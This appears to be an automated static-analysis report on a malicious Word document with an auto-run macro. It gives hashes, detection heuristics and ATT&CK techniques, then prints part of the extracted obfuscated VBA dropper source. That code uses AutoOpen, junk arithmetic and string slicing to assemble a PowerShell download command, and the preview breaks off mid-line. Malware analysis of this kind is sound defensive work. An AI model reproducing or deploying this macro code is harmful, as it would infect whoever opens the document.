Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 de0c2feef100b005…

MALICIOUS

Office (OLE)

150.5 KB Created: 2018-02-06 06:29:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: affc073c7e1bdcaf59b68ea10c378cf5 SHA-1: 1096863519e00966497af002f50f47306a11fd05 SHA-256: de0c2feef100b005e6ac6a9a1fbeca8b044a965886cffd0c1714024675cb062a
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes a Shell() call, indicating an attempt to execute an external process. The ClamAV detection 'Img.Dropper.PhishingLure-6443153-0' further suggests a dropper or downloader functionality, likely to fetch and execute a secondary payload.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45627 bytes
SHA-256: 92ea68310b0e4eaf0ba52e6e42c1989aa19d80913135ef4c77d259f98d338653
Detection
ClamAV: Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "YWXXbviW"
Sub AutoOpen()
On Error Resume Next
hDpjmzfFM = MRvmlakFfZ / ChrW(85) + 856113 / 6323344 * wOXjkoYI / Fix(iqbITjV) / 9215531 - jmoMmtNQREDJ
VGAutRPPu = nLLnEKdHB / ChrW(85) + 6872587 / 6799782 * UuUkbdWUXUErJ / Fix(bNaRGjoSwcAz) / 7917027 - mKCTafl
FaIqltatT = UdUjQjjd / ChrW(85) + 638652 / 252061 * wrkboTh / Fix(RlQiwVmSa) / 3994034 - OZfVjVUUWdTq
WdjJjYOwZ = jCVDzWNdOIIQm / ChrW(85) + 5640996 / 3351241 * DFTzKjwutA / Fix(MDtMXMVsc) / 9999786 - WwGtPKhGrGr
Application.Run "jrTCTPLshMcf", BuAmIrNnrR
NUIdahzEa = zHAZUwkD / ChrW(85) + 3264899 / 7081662 * VbjVsRTnNnJIU / Fix(ZDumovYZTXrFT) / 9130694 - wCaVDrtZH
hQdQNVpwj = vtpRcpPwIMin / ChrW(85) + 9570960 / 4591380 * QljnRwfinE / Fix(RILzhsZkAU) / 1284212 - zfnvlMduSGqw
kGLOlPOCM = YHkLflN / ChrW(85) + 2611123 / 4552979 * KzlHdCu / Fix(JKFLSOMah) / 2059713 - kFDZsHjKahsjEi
kmlUDliUz = BzNoVwEDCOnzGa / ChrW(85) + 8834216 / 118055 * sUkRdAchcbFiZQ / Fix(IKXsurobc) / 7775807 - qvljKaCoqAM
End Sub
Function BuAmIrNnrR()
On Error Resume Next
UYjBQbPEJT = ("iX0GuYsqA7N3Dqku+Pku7IPku+Pku88LDXPku+Pku/Pku+PkusBUDHN")
thRlkAm = szDVLDvG / ChrW(85) + 8013800 / 29818 * DOtEhEXIAA / Fix(rSVJtMz) / 7210213 - DQhVizkSQNNaLQ
iAjjLZQWApV = zksbhTz / ChrW(85) + 6355194 / 1627793 * FlABKjIEBQnjY / Fix(iTEsnnifBQ) / 2355021 - TVDiFjZh
JOOutS = Mid(UYjBQbPEJT, 15, 35)
ShrTSYDLGw = ("vnswm3i1KucQ29jCVOfuY7CPku+Pku/Pku+PkumPku+PkuocPku+Pku.elyPku+PkutsefEFIma5l")
YdiuvHjGt = ApEYCizcF / ChrW(85) + 2575300 / 3564777 * npNJViYidT / Fix(mADhluDTJLHK) / 2654130 - SppkKjw
qruErji = niMllcSDL / ChrW(85) + 7319786 / 6328547 * SYzzOiB / Fix(IKjizGCojtTnn) / 4220155 - VUzIbBGA
rijcGI = Mid(ShrTSYDLGw, 19, 52)
ONGqBPlirX = ("5zPk4HzTbqqGFi(('. ( cDfPSHoMe[21]+cDfPshomE'+'[30]+PkuxPku)( ( -joIN[rEGEx]::M'+'aTCHeTRAnq")
KQszUZYviYL = YrIjOiUlOiCYl / ChrW(85) + 6728450 / 402073 * oohNOHBELETp / Fix(tIPjdtbkjhdI) / 8373736 - vWTRaJR
rsbrdMO = hbjcQpD / ChrW(85) + 4684692 / 1897194 * iFVVmrHpa / Fix(EHEFWHGhsnsjPo) / 5296073 - wAclhKXOdmiZk
RSGWkB = Mid(ONGqBPlirX, 15, 73)
JUazAat = ("24Udp5rPku)iWcJjquV")
qQzIOiijQDL = LiBrfww / ChrW(85) + 5974876 / 7249041 * CXtAFqjDUjB / Fix(OsOAtqsjdL) / 8922721 - GPiwvoiCMkbk
GAMWcitq = vkLlOam / ChrW(85) + 145793 / 7454478 * IdiCHmFDr / Fix(HtqIhHjBzMi) / 3336281 - zwGhuOkHlUz
SIFDtuBm = Mid(JUazAat, 8, 5)
oSRiwzX = ("Vspot.Pku+Pkureve001//Pku+Pku:ptPku+PkutPku+Pkuh?/omWmPku+Pkus2Pku+Pkum'+'Pku+Pk'+'u/moc.tcejorpPku+PkuevolehPk'+'u+'+'Pkut.Pku+PkuwPku'+'+LYPRkzTjwHW32FbrvIXk6dZFLjXnPOaIijjB")
ONZShIEC = XktNiVjhXLwti / ChrW(85) + 7332326 / 4989857 * DTsQzGRVpKd / Fix(HnZThPwljdAq) / 1501671 - GYIDDkbV
RpSRWbHAI = LwqqQTYX / ChrW(85) + 4634187 / 8510174 * ajldLOo / Fix(vZSBInzsMmHsF) / 7410590 - NVrYhSIGcwF
wmMDr = Mid(oSRiwzX, 3, 137)
fXLwnRfTDI = ("Fvu8nWszwciIllvdn0S(2Zo)PkuXPku+]5[CilBuP:VnecDf+]31[CILBUp:vNecDf ( & cet )43]rAHC[,)17]rAHC[+77]rAHC[+94]rAHC[(  ECaLPERC-29]rAHC[,PkupJZPkuECaLPERC-63]rAHC[,PkuB1LPku EcYTC8KUjWG2q1PjUGfp")
iPhcH = YJVQqwVLwH / ChrW(85) + 9667136 / 3489294 * XYwpQmRDt / Fix(BoWdpwCibLD) / 6699967 - VpfqwiEv
lOaUiQtKHYV = KqKWUGB / ChrW(85) + 5019945 / 5447275 * fiTcUTfNw / Fix(XGLoNdAlwUZ) / 7905149 - wijTTiwcAimD
VRFYEpoMX = Mid(fXLwnRfTDI, 19, 154)
HlRijrvwob = ("NwvJ8QbRi8po'u(GMPku+Pku1gPk'+'u+PkuNI9ciPku+PkuIPku+'+'Pku9crtSoTGM1Pku+qc1ji")
WrGili = mqMXbvMm / ChrW(85) + 6434248 / 2869718 * WEhISJfGkc / Fix(TpDDiJdBX) / 7610783 - CwJnwwd
bVGlZoqCAQ = utYFDAaYzJ / ChrW(85) + 9156277 / 9053000 * hXXWTYMDJ / Fix(rhUBlziKidL) / 6610097 - ujzDIldsbs
SRPNhsv = Mid(HlRijrvwob, 13, 61)
sJDKjHvQG = ("EkzQrDKKsjt3 Pku+Pku+ ciPku'+'+PkulbuPku+'+'Pkup:vn'+'eB1Pku+PkuL =Pku+Pku Pku+PkuCDPku+PkuSB1L;)iPku+PkuD3'+'?ipLdjU9HBnvfX")
AVphhwvA = tOalVYJi / ChrW(85) + 2107845 / 669458 * CFaRiCRd / Fix(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.